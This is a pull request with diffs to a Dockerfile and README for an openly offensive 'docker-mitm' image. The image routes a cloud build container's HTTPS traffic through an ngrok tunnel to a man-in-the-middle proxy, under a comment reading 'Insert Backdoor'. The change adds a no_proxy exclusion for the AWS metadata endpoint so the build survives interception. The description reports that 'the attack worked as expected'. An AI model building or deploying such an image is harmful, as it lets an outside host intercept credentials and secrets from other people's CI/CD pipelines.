### PR TITLE
Added no_proxy variable to ignore AWS specific traffic.

### DIFF
--- a/Dockerfile
+++ b/Dockerfile
@@ -9,6 +9,8 @@ COPY cacert.pem /cacert.pem
 RUN chmod +r /cacert.pem
 RUN chmod -w /cacert.pem
 
+# Do not proxy AWS specific trafic
+ENV no_proxy="169.254.169.254,*.amazonaws.com"
 # Insert Backdoor
 ENV https_proxy="http://5.tcp.eu.ngrok.io:10548"
 #ENV http_proxy="http://4.tcp.eu.ngrok.io:11125" #Only enebale this if you want to capute HTTP traffic (do NOT enable this for AWS stuff as aws stuff tries to access metadata endpoint via http)

--- a/Dockerfile
+++ b/Dockerfile
@@ -9,7 +9,7 @@ COPY cacert.pem /cacert.pem
 RUN chmod +r /cacert.pem
 RUN chmod -w /cacert.pem
 
-# Do not proxy AWS specific trafic
+# Do not proxy AWS specific trafic (need to adjust based on cloud environement)
 ENV no_proxy="169.254.169.254,*.amazonaws.com"
 # Insert Backdoor
 ENV https_proxy="http://5.tcp.eu.ngrok.io:10548"

--- a/Readme.md
+++ b/Readme.md
@@ -9,6 +9,10 @@ This is useful in environments where:
 
 This Docker image is public in **docker.io/carlospolop/docker-mitm:v6** (This would be useless for you as your proxy ad cert will be different).
 
+```
+Note: according to cloud.hacktricks.xyz the version of mitmproxy 9.0.1 has to be used, can be downloaded here: https://mitmproxy.org/downloads/#9.0.1/
+```
+
 ### Start MitM proxy
 
 ```bash


### PR DESCRIPTION
The server was hosted on DigitalOcean. It appeared that after multiple connection attempts by AWS to the server, the build was failing. Errors in Mitmproxy included:

`Client TLS handshake failed. The client does not trust the proxy's certificate for codebui…(more in eventlog)`
or
`Client connection from 34.228.4.221 killed by block_global option` (if block_global=false was not specified).

Additionally, the container build failed with the following error:

```
{
    "statusCode": "SINGLE_BUILD_CONTAINER_DEAD",
    "message": "Build container found dead before completing the build. Build container died because it was out of memory, or the Docker image is not supported."
}
```

To resolve this issue, I added the following to the Dockerfile and updated image on Dockerhub:

```
ENV no_proxy="169.254.169.254,*.amazonaws.com"
```

Afterward, the attack worked as expected.